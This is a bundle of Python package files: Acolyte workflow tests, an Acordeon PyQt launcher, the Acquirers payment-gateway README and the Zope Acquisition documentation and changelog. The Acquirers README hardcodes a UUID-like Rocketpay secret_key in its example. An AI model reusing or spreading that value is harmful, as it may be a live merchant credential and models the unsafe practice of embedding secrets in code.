class TestFlowMeta(FlowMeta):
def __init__(self):
super().__init__(
name="test_flow",
description="just a test flow",
jobs=(
JobRef(
"echo",
trigger={
"a": 5
},
finish={
},
failure={
}
),
JobRef("old_man"),
JobRef("job_A"),
),
start_args={
"x": -1,
"y": -2
},
)
@declare_args(
IntField("x", required=True),
IntField("y", required=True)
)
def on_start(self, context, x, y):
print("start the workflow, x = {x}, y = {y}".format(
x=x,
y=y
))
print("=====> dev email: {}".format(context.config["dev_email"]))
def on_failure(self, context):
print("the whole workflow failure")
def on_finish(self, context):
print("the whole workflow finished")
# 构建测试使用的容器
flow_meta_mgr = DictBasedManager()
test_flow_meta = TestFlowMeta()
flow_meta_mgr.register(test_flow_meta.name, test_flow_meta)
job_mgr = JobManager("acolyte.job")
echo_job = EchoJob()
job_mgr.register(echo_job.name, echo_job)
old_man_job = OldManJob()
job_mgr.register(old_man_job.name, old_man_job)
for job_type in (AJob, BJob, CJob, DJob):
job = job_type()
job_mgr.register(job.name, job)
notify_tpl_mgr = DictBasedManager()
notify_tpl_mgr.register("test", NotifyTemplate(
name="test",
subject_template="你好,{name}",
content_template="{name} 你好,我真的是查水表的。",
digest_template="{name} 快开门,查水表的。"
)) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/mgr_define.py | mgr_define.py |
import simplejson as json
from acolyte.testing import EasemobFlowTestCase, MockContext
from acolyte.builtin_ext.github import (
GithubPushJob,
TravisCIJob,
)
from acolyte.util.lang import get_from_nested_dict
class GithubPushJobTestCase(EasemobFlowTestCase):
def setUp(self):
self._ctx = MockContext(
executor=None,
config={},
flow_instance_id=0,
job_instance_id=0,
job_action_id=0,
current_step="github_push"
)
self._github_push_job = GithubPushJob()
def testTrigger(self):
with open("resource/testing/github_push_res.json") as f:
hook_data = json.loads(f.read())
self._github_push_job.on_trigger(self._ctx, hook_data)
self.assertEqual(
get_from_nested_dict(
self._ctx.saved_data, 0, 0, 0, "pusher", "email"),
"[email protected]"
)
class TravisCIJobTestCase(EasemobFlowTestCase):
def setUp(self):
self._ctx = MockContext(
executor=None,
config={
"jar_saved_dir": "/tmp",
"jar_download_base_url": "http://127.0.0.1/jars"
},
flow_instance_id=0,
job_instance_id=0,
job_action_id=0,
current_step="travis"
)
self._travis_ci_job = TravisCIJob()
def testTrigger(self):
self._travis_ci_job.on_trigger(self._ctx)
self.assertIsNotNone(
get_from_nested_dict(self._ctx.saved_data, 0, 0, 0, "begin_time"))
def testOnBuildFinish(self):
with open("resource/testing/base64_jar", "r") as f:
base64_code = f.read()
# 构建正常
self._travis_ci_job.on_build_finish(
self._ctx,
build_result=0,
test_result={
},
findbug_result={
},
jar_file_name="testjar.jar",
jar_base64=base64_code
)
self.assertIsNotNone(self._ctx["jar_download_url"])
self.assertEqual(
get_from_nested_dict(
self._ctx.saved_data, 0, 0, 0, "build_result"), 0)
self.assertIsNotNone(
get_from_nested_dict(
self._ctx.saved_data, 0, 0, 0, "jar_download_url")) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/builtin_ext/github.py | github.py |
import typing
from acolyte.testing import EasemobFlowTestCase
from acolyte.util.validate import (
IntField,
StrField,
InvalidFieldException,
BadReq,
check,
)
from acolyte.testing.core.mgr_define import TestFlowMeta
class RuleTestCase(EasemobFlowTestCase):
def testIntField(self):
"""测试IntField类型的规则
"""
int_field = IntField("age", min_=6, max_=100)
# 值正常的时候
self.assertEqual(int_field(99), 99)
self.assertEqual(int_field("10"), 10)
# 类型不匹配
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field("nidaye")
self._assert_invalid_f(
raise_ctx.exception, "age", "nidaye", "invalid_type", "int")
# 大小不匹配
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field(-1)
self._assert_invalid_f(
raise_ctx.exception, "age", -1, "less_than_min", 6)
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field(101)
self._assert_invalid_f(
raise_ctx.exception, "age", 101, "more_than_max", 100)
# 自定义检查逻辑
def _my_check(field_name, age):
if age % 2 != 0:
raise InvalidFieldException(
field_name, age, "invalid_age", "even")
int_field = IntField("age", min_=6, max_=100, check_logic=_my_check)
# 值正确的情况
self.assertEqual(int_field(6), 6)
self.assertEqual(int_field(100), 100)
# 值不正确的情况
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field(7)
self._assert_invalid_f(
raise_ctx.exception, "age", 7, "invalid_age", "even")
# required but value is None
with self.assertRaises(InvalidFieldException) as raise_ctx:
int_field(None)
self._assert_invalid_f(raise_ctx.exception, "age", None, "empty", "")
# not required and value is None
int_rule = IntField("age", False, default=6)
self.assertEqual(int_rule(None), 6)
def testStrField(self):
"""测试StrField类型的规则
"""
def _my_check(field_name, value):
parts = value.split("@")[-1].split(".")
if len(parts) != 2:
raise InvalidFieldException(
field_name, value, "invalid_parts", 2)
str_field = StrField(
name="email",
required=True,
min_len=6,
max_len=100,
regex=r'^[\w.-]+@[\w.-]+.\w+$',
check_logic=_my_check
)
# 正常检查
self.assertEqual(str_field("[email protected]"), "[email protected]")
# 太短
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field("[email protected]")
self._assert_invalid_f(
raise_ctx.exception, "email", "[email protected]", "less_than_min_length", 6)
# 太长
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field("z@z." + "c" * 100)
self._assert_invalid_f(
raise_ctx.exception, "email", "z@z." + "c" * 100,
"more_than_max_length", 100)
# 不符合正则
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field("nidayehehe")
self._assert_invalid_f(raise_ctx.exception, "email",
"nidayehehe", "invalid_format",
r'^[\w.-]+@[\w.-]+.\w+$')
# 不符合自定义的检查规则
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field("[email protected]")
self._assert_invalid_f(
raise_ctx.exception, "email", "[email protected]", "invalid_parts", 2)
# required but value is None
with self.assertRaises(InvalidFieldException) as raise_ctx:
str_field(None)
self._assert_invalid_f(
raise_ctx.exception, "email", None, "empty", "")
# not requied and value is None
str_rule = StrField("name", required=False, default="Jack")
self.assertEqual(str_rule(None), "Jack")
def _assert_invalid_f(self, exc, field_name, value, reason, expect):
"""assert InvalidFieldException
"""
self.assertEqual(exc.field_name, field_name)
self.assertEqual(exc.value, value)
self.assertEqual(exc.reason, reason)
self.assertEqual(exc.expect, expect)
class CheckDecoratorTestCase(EasemobFlowTestCase):
"""针对check decorator的测试
"""
def setUp(self):
self.messages = {
"zh_CN": {
"AService": {
"a": {
}
},
"BService": {
"b": {
"invalid_id": "不合法的ID值'{id}'"
}
}
}
}
def testCommon(self):
"""测试check decorator的常规使用
"""
class AService:
@check(
IntField("id", required=True, min_=6, max_=100),
StrField("name", required=True, min_len=3, max_len=20),
StrField("grade", required=False, default="X",
regex=r'^[A-Z]$'),
messages=self.messages
)
def a(self, id: int, name: str, grade: str) -> typing.Tuple:
return id, name, grade
a = AService()
# 普通传参
self.assertEqual(a.a(6, "Sam", "A"), (6, "Sam", "A"))
# 完全字典传参
self.assertEqual(a.a(id=6, name="Sam", grade=None), (6, "Sam", "X"))
# 混合传参
self.assertEqual(a.a(10, "Jack", grade="B"), (10, "Jack", "B"))
# 出错
# 不需要渲染msg的情况
rs = a.a(None, "Sam", None)
self.assertEqual(rs.status_code, 400)
self.assertEqual(rs.reason, "id_empty")
self.assertEqual(rs.msg, "id参数不能为空")
# 需要渲染msg的情况
rs = a.a(1, "Jack", None)
self.assertEqual(rs.status_code, 400)
self.assertEqual(rs.reason, "id_less_than_min")
self.assertEqual(rs.msg, "id参数不能小于6")
def testBadReq(self):
"""测试BadReq异常
"""
class BService:
@check(
IntField("id"),
messages=self.messages
)
def b(self, id):
if id < 1:
raise BadReq("invalid_id", id=id)
b = BService()
rs = b.b(0)
self.assertEqual(rs.status_code, 400)
self.assertEqual(rs.reason, "invalid_id")
self.assertEqual(rs.msg, "不合法的ID值'0'")
class DeclareArgsDecoratorTestCase(EasemobFlowTestCase):
def testDeclareArgs(self):
"""测试被declare_args注解所修饰的方法
"""
tmf = TestFlowMeta()
self.assertEqual(len(tmf.on_start.field_rules), 2) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/util/validate.py | validate.py |
import re
import datetime
from acolyte.testing import EasemobFlowTestCase
from acolyte.util import lang, time
class DictClass:
def __init__(self, id_, name, birth, grade):
self.id_ = id_
self.name = name
self.birth = birth
self.grade = grade
class SlotsClass:
__slots__ = "id_", "name", "birth"
def __init__(self, id_, name, birth):
self.id_ = id_
self.name = name
self.birth = birth
PATTERN = re.compile("<(.*)>")
class ToStrTestCase(EasemobFlowTestCase):
"""测试lang.to_str函数
"""
def setUp(self):
self._dict_obj = DictClass(1, "SamChi", "1989-11-07", 2)
self._slots_obj = SlotsClass(1, "Jackson", "1989-11-07")
def testToStringWithTargetFields(self):
"""lang.to_str 指定fields的情形
"""
string = lang.to_str(self._dict_obj, "name", "birth", "grade")
self._check_parts_num(string, 3)
string = lang.to_str(self._slots_obj, "name", "birth")
self._check_parts_num(string, 2)
def testToStringWithoutTargetFields(self):
"""lang.to_str 不指定fields的情形
"""
string = lang.to_str(self._dict_obj)
self._check_parts_num(string, 4)
string = lang.to_str(self._slots_obj)
self._check_parts_num(string, 3)
def testWithCallback(self):
"""lang.to_str field中包含callback的情况
"""
dict_obj = DictClass(1, "SamChi", datetime.datetime.now(), 2)
string = lang.to_str(dict_obj,
"name", ("birth", time.common_fmt_dt), "grade")
print(string)
def _check_parts_num(self, string, expected_num):
parts = PATTERN.search(string).group(1).split(',')
self.assertEqual(len(parts), expected_num)
class GetFromNestedDictTestCase:
def testCommon(self):
d = {
"a": {
"b": {
"c": {
"e": 2
}
}
}
}
self.assertEqual(lang.get_from_nested_dict(d, "a", "b", "c", "e"), 2)
self.assertIsNone(lang.get_from_nested_dict(d, "a", "h"), None) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/util/lang.py | lang.py |
import time
import threading
from acolyte.testing import EasemobFlowTestCase
from acolyte.util.db import ConnectionPool
class DBPoolTestCase(EasemobFlowTestCase):
"""数据库连接池测试用例
"""
def testCommonQuery(self):
connect_config = {
"host": "localhost",
"port": 3306,
"user": "root",
"password": "",
"db": "easemob_flow",
"charset": "utf8"
}
count = 0
cdt = threading.Condition()
def query_():
nonlocal count
with pool.connection() as conn:
with conn.cursor() as csr:
csr.execute("select 1", tuple())
result = csr.fetchone()
print(result)
self.assertEqual(result, {"1": 1})
with cdt:
count += 1
cdt.notify_all()
pool = ConnectionPool(connect_config, max_pool_size=2)
for _ in range(10):
threading.Thread(target=query_).start()
with cdt:
while count < 10:
cdt.wait()
cdt = threading.Condition()
count = 0
def _fight_for_lock(sleep_time):
"""锁争夺
"""
nonlocal pool
nonlocal count
with pool.lock("nidaye"):
print("Thread '{thread_name}' get the lock!".format(
thread_name=threading.currentThread().name))
time.sleep(sleep_time)
print("Thread '{thread_name}' release the lock!".format(
thread_name=threading.currentThread().name))
with cdt:
count += 1
cdt.notify_all()
for i in range(5):
t = threading.Thread(target=_fight_for_lock, args=(0.5,))
t.name = "hehe %d" % i
t.start()
with cdt:
while count < 5:
cdt.wait()
def _fight_for_try_lock(sleep_time):
"""测试try lock的情况
"""
nonlocal pool
nonlocal self
with pool.lock("hehe", 0) as lock_rs:
self.assertTrue(lock_rs)
print("Thread '{thread_name}' get the hehe lock".format(
thread_name=threading.currentThread().name))
time.sleep(sleep_time)
print("Thread '{thread_name}' release the hehe lock!".format(
thread_name=threading.currentThread().name))
t = threading.Thread(target=_fight_for_try_lock, args=(1,))
t.name = "hehe-x"
t.start()
with pool.lock("hehe", 0) as lock_rs:
self.assertFalse(lock_rs)
t.join() | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/util/db.py | db.py |
from PyQt4.QtGui import QApplication
from .forms import Form
import sys
def _get_static_file():
root_static_path = 'static/'
return root_static_path
def _get_default_name():
return 'Application Name'
def _get_default_css():
css = """
#main_window{background: #FFF;}
"""
return css
class App(object):
def __init__(self, name=None):
self.with_css = False
if name is not None:
self.name = name
if self.name == '':
self.name = _get_default_name()
return
self.name = _get_default_name()
def application(self, type_app='form'):
if type_app == 'form':
pass
print type_app
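    # Build the QApplication, create the main Form window, apply CSS
    # styling (external stylesheet if requested) and start the event loop.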
def create_app(self, width, height, width_fix, with_css):
app = QApplication(sys.argv)
form = Form(width, height, self.name, width_fix)
form.create_form_gui('main_window')
form.add_input_field('Nombre')
form.show()
css_path = _get_static_file()
def_css = _get_default_css()
if with_css:
try:
with open('{}css/style.css'.format(css_path), 'r') as t:
tema = t.read()
app.setStyleSheet(tema)
except IOError:
# Fall back to the built-in default stylesheet if the CSS file is missing.
print "css file not found, loading default css styles"
app.setStyleSheet(def_css)
else:
app.setStyleSheet(def_css)
app.setStyle('cleanlooks')
sys.exit(app.exec_())
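    # Public entry point: resolve window size and CSS options, then
    # delegate to create_app.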
def run(self,
width=None,
height=None,
width_fixed=False,
load_css=False,
is_form=True):
width_app, height_app, width_fixed_app = 400, 600, False
if width is not None:
width_app = width
if height is not None:
height_app = height
if width_fixed is not False:
width_fixed_app = width_fixed
if load_css:
self.with_css = load_css
self.create_app(width_app, height_app, width_fixed_app, self.with_css) | Acordeon | /Acordeon-0.1.tar.gz/Acordeon-0.1/acordeon/create_app.py | create_app.py |
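# Example usage sketch (values below are illustrative placeholders):
#
#     app = App('Demo application')
#     app.run(width=500, height=700, width_fixed=True, load_css=True)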
# Acquirers

[](https://pypi.org/project/Acquirers/)
## Who uses this module
- http://www.procdn.net
- http://www.gocloud.ru
- http://www.glavpodcast.ru
- http://www.zettadns.com
## Supported Acquirers
- [A-3](https://www.a-3.ru)
- [Tinkoff](https://oplata.tinkoff.ru/landing/develop/documentation/processing_payment)
- [Robokassa](https://robokassa.ru)
## Install
```shell
pip install Acquirers
```
## Tinkoff
API Documentation: https://oplata.tinkoff.ru/landing/develop/documentation/processing_payment
```python
from Acquirers.Tinkoff import TinkoffSimplePayment
t = TinkoffSimplePayment(terminal_id, password)
t.init(tr.id, amount_tinkoff)
```
Result
```json
{
"Success": true,
"ErrorCode": "0",
"TerminalKey": "1520095906182DEMO",
"Status": "NEW",
"PaymentId": "14458036",
"OrderId": "02eb4dae-ec1e-44b2-844f-4e5c21e0bb88",
"Amount": 100,
"PaymentURL": "https://securepay.tinkoff.ru/pX81zg"
}
```
## Yandex.kassa
API Doc: https://kassa.yandex.ru/developers/api
## Rocketpay
```python
from Acquirers.Rocketpay import RocketpaySimplePayment
rp = RocketpaySimplePayment()
rp.merchant_id = '4'
rp.terminal_id = '4'
rp.secret_key = '265af92d-1ed8-433b-8c54-fa02a45f1227'
```
Initiate a payment:
```python
rp.init(order_id="example", amount="1.0")
```
| Acquirers | /Acquirers-0.0.7.tar.gz/Acquirers-0.0.7/README.md | README.md |
Environmental Acquisition
=========================
This package implements "environmental acquisition" for Python, as
proposed in the OOPSLA96_ paper by Joseph Gil and David H. Lorenz:
We propose a new programming paradigm, environmental acquisition in
the context of object aggregation, in which objects acquire
behaviour from their current containers at runtime. The key idea is
that the behaviour of a component may depend upon its enclosing
composite(s). In particular, we propose a form of feature sharing in
which an object "inherits" features from the classes of objects in
its environment. By examining the declaration of classes, it is
possible to determine which kinds of classes may contain a
component, and which components must be contained in a given kind of
composite. These relationships are the basis for language constructs
that supports acquisition.
.. _OOPSLA96: http://www.cs.virginia.edu/~lorenz/papers/oopsla96/
.. contents::
Introductory Example
--------------------
Zope implements acquisition with "Extension Class" mix-in classes. To
use acquisition your classes must inherit from an acquisition base
class. For example::
>>> import ExtensionClass, Acquisition
>>> class C(ExtensionClass.Base):
... color = 'red'
>>> class A(Acquisition.Implicit):
... def report(self):
... print(self.color)
...
>>> a = A()
>>> c = C()
>>> c.a = a
>>> c.a.report()
red
>>> d = C()
>>> d.color = 'green'
>>> d.a = a
>>> d.a.report()
green
>>> try:
... a.report()
... except AttributeError:
... pass
... else:
... raise AssertionError('AttributeError not raised.')
The class ``A`` inherits acquisition behavior from
``Acquisition.Implicit``. The object, ``a``, "has" the color of
objects ``c`` and ``d`` when it is accessed through them, but it has no
color by itself. The object ``a`` obtains attributes from its
environment, where its environment is defined by the access path used
to reach ``a``.
Acquisition Wrappers
--------------------
When an object that supports acquisition is accessed through an
extension class instance, a special object, called an acquisition
wrapper, is returned. In the example above, the expression ``c.a``
returns an acquisition wrapper that contains references to both ``c``
and ``a``. It is this wrapper that performs attribute lookup in ``c``
when an attribute cannot be found in ``a``.
Acquisition wrappers provide access to the wrapped objects through the
attributes ``aq_parent``, ``aq_self``, and ``aq_base``. Continuing the
example from above::
>>> c.a.aq_parent is c
True
>>> c.a.aq_self is a
True
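``aq_base`` goes one step further and strips *all* acquisition wrappers,
returning the innermost object. For the single-level wrapper above this
is simply ``a`` again (a minimal illustration reusing the objects
defined earlier)::
    >>> c.a.aq_base is a
    True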
Explicit and Implicit Acquisition
---------------------------------
Two styles of acquisition are supported: implicit and explicit
acquisition.
Implicit acquisition
--------------------
Implicit acquisition is so named because it searches for attributes
from the environment automatically whenever an attribute cannot be
obtained directly from an object or through inheritance.
An attribute can be implicitly acquired if its name does not begin
with an underscore.
To support implicit acquisition, your class should inherit from the
mix-in class ``Acquisition.Implicit``.
Explicit Acquisition
--------------------
When explicit acquisition is used, attributes are not automatically
obtained from the environment. Instead, the ``aq_acquire`` method must be
used. For example::
>>> print(c.a.aq_acquire('color'))
red
To support explicit acquisition, your class should inherit from the
mix-in class ``Acquisition.Explicit``.
Controlling Acquisition
-----------------------
A class (or instance) can provide attribute-by-attribute control over
acquisition. You should subclass from ``Acquisition.Explicit`` and set
all attributes that should be acquired to the special value
``Acquisition.Acquired``. Setting an attribute to this value also allows
inherited attributes to be overridden with acquired ones. For example::
>>> class C(Acquisition.Explicit):
... id = 1
... secret = 2
... color = Acquisition.Acquired
... __roles__ = Acquisition.Acquired
The only attributes that are automatically acquired from containing
objects are color, and ``__roles__``. Note that the ``__roles__``
attribute is acquired even though its name begins with an
underscore. In fact, the special ``Acquisition.Acquired`` value can be
used in ``Acquisition.Implicit`` objects to implicitly acquire
selected objects that smell like private objects.
Sometimes, you want to dynamically make an implicitly acquiring object
acquire explicitly. You can do this by getting the object's
``aq_explicit`` attribute. This attribute provides the object with an
explicit wrapper that replaces the original implicit wrapper.
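For example (a brief sketch reusing ``c`` and ``a`` from the
introductory example; the explicit wrapper still acquires through
``aq_acquire``, but not through plain attribute access)::
    >>> print(c.a.aq_explicit.aq_acquire('color'))
    red
    >>> try:
    ...     c.a.aq_explicit.color
    ... except AttributeError:
    ...     pass
    ... else:
    ...     raise AssertionError('AttributeError not raised.')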
Filtered Acquisition
--------------------
The acquisition method, ``aq_acquire``, accepts two optional
arguments. The first of the additional arguments is a "filtering"
function that is used when considering whether to acquire an
object. The second of the additional arguments is an object that is
passed as extra data when calling the filtering function and which
defaults to ``None``. The filter function is called with five
arguments:
* The object that the ``aq_acquire`` method was called on,
* The object where an object was found,
* The name of the object, as passed to ``aq_acquire``,
* The object found, and
* The extra data passed to ``aq_acquire``.
If the filter returns a true value, the object found is returned;
otherwise, the acquisition search continues.
Here's an example::
>>> from Acquisition import Explicit
>>> class HandyForTesting(object):
... def __init__(self, name):
... self.name = name
... def __str__(self):
... return "%s(%s)" % (self.name, self.__class__.__name__)
... __repr__=__str__
...
>>> class E(Explicit, HandyForTesting): pass
...
>>> class Nice(HandyForTesting):
... isNice = 1
... def __str__(self):
... return HandyForTesting.__str__(self)+' and I am nice!'
... __repr__ = __str__
...
>>> a = E('a')
>>> a.b = E('b')
>>> a.b.c = E('c')
>>> a.p = Nice('spam')
>>> a.b.p = E('p')
>>> def find_nice(self, ancestor, name, object, extra):
... return hasattr(object,'isNice') and object.isNice
>>> print(a.b.c.aq_acquire('p', find_nice))
spam(Nice) and I am nice!
The filtered acquisition in the last line skips over the first
attribute it finds with the name ``p``, because the attribute doesn't
satisfy the condition given in the filter.
Filtered acquisition is rarely used in Zope.
Acquiring from Context
----------------------
Normally acquisition allows objects to acquire data from their
containers. However, an object can acquire from objects that aren't its
containers.
Most of the examples we've seen so far establish an
acquisition context using getattr semantics. For example, ``a.b`` is a
reference to ``b`` in the context of ``a``.
You can also manually set acquisition context using the ``__of__``
method. For example::
>>> from Acquisition import Implicit
>>> class C(Implicit): pass
...
>>> a = C()
>>> b = C()
>>> a.color = "red"
>>> print(b.__of__(a).color)
red
In this case, ``a`` does not contain ``b``, but it is put in ``b``'s
context using the ``__of__`` method.
Here's another subtler example that shows how you can construct an
acquisition context that includes non-container objects::
>>> from Acquisition import Implicit
>>> class C(Implicit):
... def __init__(self, name):
... self.name = name
>>> a = C("a")
>>> a.b = C("b")
>>> a.b.color = "red"
>>> a.x = C("x")
>>> print(a.b.x.color)
red
Even though ``b`` does not contain ``x``, ``x`` can acquire the color
attribute from ``b``. This works because in this case, ``x`` is accessed
in the context of ``b`` even though it is not contained by ``b``.
Here acquisition context is defined by the objects used to access
another object.
Containment Before Context
--------------------------
Now suppose that, in the example above, both ``a`` and ``b`` have a color attribute::
>>> a = C("a")
>>> a.color = "green"
>>> a.b = C("b")
>>> a.b.color = "red"
>>> a.x = C("x")
>>> print(a.b.x.color)
green
Why does ``a.b.x.color`` acquire color from ``a`` and not from ``b``?
The answer is that an object acquires from its containers before
non-containers in its context.
To see why, consider this example in terms of expressions using the
``__of__`` method::
a.x -> x.__of__(a)
a.b -> b.__of__(a)
a.b.x -> x.__of__(a).__of__(b.__of__(a))
Keep in mind that attribute lookup in a wrapper is done by trying to
look up the attribute in the wrapped object first and then in the
parent object. So lookup in the expressions above proceeds from left to
right.
The upshot of these rules is that attributes are looked up by
containment before context.
This rule holds true also for more complex examples. For example,
``a.b.c.d.e.f.g.attribute`` would search for attribute in ``g`` and
all its containers first. (Containers are searched in order from the
innermost parent to the outermost container.) If the attribute is not
found in ``g`` or any of its containers, then the search moves to
``f`` and all its containers, and so on.
Additional Attributes and Methods
---------------------------------
You can use the special attribute ``aq_inner`` to access an object
wrapped only by containment. So in the example above,
``a.b.x.aq_inner`` is equivalent to ``a.x``.
You can find out the acquisition context of an object using the
``aq_chain`` attribute like so:
>>> [obj.name for obj in a.b.x.aq_chain]
['x', 'b', 'a']
You can find out if an object is in the containment context of another
object using the ``aq_inContextOf`` method. For example:
>>> a.b.aq_inContextOf(a)
True
.. Note: as of this writing the aq_inContextOf examples don't work the
way they should be working. According to Jim, this is because
aq_inContextOf works by comparing object pointer addresses, which
(because they are actually different wrapper objects) doesn't give
you the expected results. He acknowledges that this behavior is
controversial, and says that there is a collector entry to change
it so that you would get the answer you expect in the above. (We
just need to get to it).
Acquisition Module Functions
----------------------------
In addition to using acquisition attributes and methods directly on
objects you can use similar functions defined in the ``Acquisition``
module. These functions have the advantage that you don't need to
check to make sure that the object has the method or attribute before
calling it.
``aq_acquire(object, name [, filter, extra, explicit, default, containment])``
Acquires an object with the given name.
This function can be used to explictly acquire when using explicit
acquisition and to acquire names that wouldn't normally be
acquired.
The function accepts a number of optional arguments:
``filter``
A callable filter object that is used to decide if an object
should be acquired.
The filter is called with five arguments:
* The object that the aq_acquire method was called on,
* The object where an object was found,
* The name of the object, as passed to aq_acquire,
* The object found, and
* The extra argument passed to aq_acquire.
If the filter returns a true object that the object found is
returned, otherwise, the acquisition search continues.
``extra``
Extra data to be passed as the last argument to the filter.
``explicit``
A flag (boolean value) indicating whether explicit acquisition
should be used. The default value is true. If the flag is
true, then acquisition will proceed regardless of whether
wrappers encountered in the search of the acquisition
hierarchy are explicit or implicit wrappers. If the flag is
false, then parents of explicit wrappers are not searched.
This argument is useful if you want to apply a filter without
overriding explicit wrappers.
``default``
A default value to return if no value can be acquired.
``containment``
A flag indicating whether the search should be limited to the
containment hierarchy.
In addition, arguments can be provided as keywords.
``aq_base(object)``
Return the object with all wrapping removed.
``aq_chain(object [, containment])``
Return a list containing the object and it's acquisition
parents. The optional argument, containment, controls whether the
containment or access hierarchy is used.
``aq_get(object, name [, default, containment])``
Acquire an attribute, name. A default value can be provided, as
can a flag that limits search to the containment hierarchy.
``aq_inner(object)``
Return the object with all but the innermost layer of wrapping
removed.
``aq_parent(object)``
Return the acquisition parent of the object or None if the object
is unwrapped.
``aq_self(object)``
Return the object with one layer of wrapping removed, unless the
object is unwrapped, in which case the object is returned.
In most cases it is more convenient to use these module functions
instead of the acquisition attributes and methods directly.
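For instance, reusing the ``c`` object from the first example (a brief
illustrative sketch)::

  >>> from Acquisition import aq_parent, aq_acquire
  >>> aq_parent(c.a) is c
  True
  >>> print(aq_acquire(c.a, 'color'))
  red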
Acquisition and Methods
-----------------------
Python methods of objects that support acquisition can use acquired
attributes. When a Python method is called on an object that is
wrapped by an acquisition wrapper, the wrapper is passed to the method
as the first argument. This rule also applies to user-defined method
types and to C methods defined in pure mix-in classes.
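For example (the ``Folder`` and ``Widget`` classes below are purely
illustrative)::

  >>> from Acquisition import Implicit
  >>> class Folder(Implicit):
  ...     color = 'red'
  ...
  >>> class Widget(Implicit):
  ...     def describe(self):
  ...         return self.color
  ...
  >>> f = Folder()
  >>> f.widget = Widget()
  >>> print(f.widget.describe())
  red

Because ``describe`` receives the acquisition wrapper as ``self``, the
``color`` attribute is acquired from the containing ``Folder``.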
Unfortunately, C methods defined in extension base classes that define
their own data structures cannot use acquired attributes at this
time. This is because wrapper objects do not conform to the data
structures expected by these methods. In practice, you will seldom
find this a problem.
Conclusion
----------
Acquisition provides a powerful way to dynamically share information
between objects. Zope 2 uses acquisition for a number of its key
features including security, object publishing, and DTML variable
lookup. Acquisition also provides an elegant solution to the problem
of circular references for many classes of problems. While acquisition
is powerful, you should take care when using acquisition in your
applications. The details can get complex, especially with the
differences between acquiring from context and acquiring from
containment.
Changelog
=========
4.4.4 (2017-11-24)
------------------
- Add Appveyor configuration to automate building Windows eggs
4.4.3 (2017-11-23)
------------------
- Fix the extremely rare potential for a crash when the C extensions
are in use. See `issue 21 <https://github.com/zopefoundation/Acquisition/issues/21>`_.
4.4.2 (2017-05-12)
------------------
- Fixed C capsule name to fix import errors.
- Ensure our dependencies match our expectations about C extensions.
4.4.1 (2017-05-04)
------------------
- Fix C code under Python 3.4, with missing Py_XSETREF.
4.4.0 (2017-05-04)
------------------
- Enable the C extension under Python 3.
- Drop support for Python 3.3.
4.3.0 (2017-01-20)
------------------
- Make tests compatible with ExtensionClass 4.2.0.
- Drop support for Python 2.6 and 3.2.
- Add support for Python 3.5 and 3.6.
4.2.2 (2015-05-19)
------------------
- Make the pure-Python Acquirer objects cooperatively use the
superclass ``__getattribute__`` method, like the C implementation.
See https://github.com/zopefoundation/Acquisition/issues/7.
- The pure-Python implicit acquisition wrapper allows wrapped objects
to use ``object.__getattribute__(self, name)``. This differs from
the C implementation, but is important for compatibility with the
pure-Python versions of libraries like ``persistent``. See
https://github.com/zopefoundation/Acquisition/issues/9.
4.2.1 (2015-04-23)
------------------
- Correct several dangling pointer uses in the C extension,
potentially fixing a few interpreter crashes. See
https://github.com/zopefoundation/Acquisition/issues/5.
4.2 (2015-04-04)
----------------
- Add support for PyPy, PyPy3, and Python 3.2, 3.3, and 3.4.
4.1 (2014-12-18)
----------------
- Bump dependency on ``ExtensionClass`` to match current release.
4.0.3 (2014-11-02)
------------------
- Skip readme.rst tests when tests are run outside a source checkout.
4.0.2 (2014-11-02)
------------------
- Include ``*.rst`` files in the release.
4.0.1 (2014-10-30)
------------------
- Tolerate Unicode attribute names (ASCII only). LP #143358.
- Make module-level ``aq_acquire`` API respect the ``default`` parameter.
LP #1387363.
- Don't raise an attribute error for ``__iter__`` if the fallback to
``__getitem__`` succeeds. LP #1155760.
4.0 (2013-02-24)
----------------
- Added trove classifiers to project metadata.
4.0a1 (2011-12-13)
------------------
- Raise `RuntimeError: Recursion detected in acquisition wrapper` if an object
with a `__parent__` pointer points to a wrapper that in turn points to the
original object.
- Prevent wrappers from being created while accessing `__parent__` on types derived
from Explicit or Implicit base classes.
2.13.9 (2015-02-17)
-------------------
- Tolerate Unicode attribute names (ASCII only). LP #143358.
- Make module-level ``aq_acquire`` API respect the ``default`` parameter.
LP #1387363.
- Don't raise an attribute error for ``__iter__`` if the fallback to
``__getitem__`` succeeds. LP #1155760.
2.13.8 (2011-06-11)
-------------------
- Fixed a segfault on 64bit platforms when providing the `explicit` argument to
the aq_acquire method of an Acquisition wrapper. Thx to LP #675064 for the
hint to the solution. The code passed an int instead of a pointer into a
function.
2.13.7 (2011-03-02)
-------------------
- Fixed bug: When an object did not implement ``__unicode__``, calling
``unicode(wrapped)`` was calling ``__str__`` with an unwrapped ``self``.
2.13.6 (2011-02-19)
-------------------
- Add ``aq_explicit`` to ``IAcquisitionWrapper``.
- Fixed bug: ``unicode(wrapped)`` was not calling a ``__unicode__``
method on wrapped objects.
2.13.5 (2010-09-29)
-------------------
- Fixed unit tests that failed on 64bit Python on Windows machines.
2.13.4 (2010-08-31)
-------------------
- LP 623665: Fixed typo in Acquisition.h.
2.13.3 (2010-04-19)
-------------------
- Use the doctest module from the standard library and no longer depend on
zope.testing.
2.13.2 (2010-04-04)
-------------------
- Give both wrapper classes a ``__getnewargs__`` method, which causes the ZODB
optimization to fail and create persistent references using the ``_p_oid``
alone. This happens to be the persistent oid of the wrapped object. This lets
these objects to be persisted correctly, even though they are passed to the
ZODB in a wrapped state.
- Added failing tests for http://dev.plone.org/plone/ticket/10318. This shows
an edge-case where AQ wrappers can be pickled using the specific combination
of cPickle, pickle protocol one and a custom Pickler class with an
``inst_persistent_id`` hook. Unfortunately this is the exact combination used
by ZODB3.
2.13.1 (2010-02-23)
-------------------
- Update to include ExtensionClass 2.13.0.
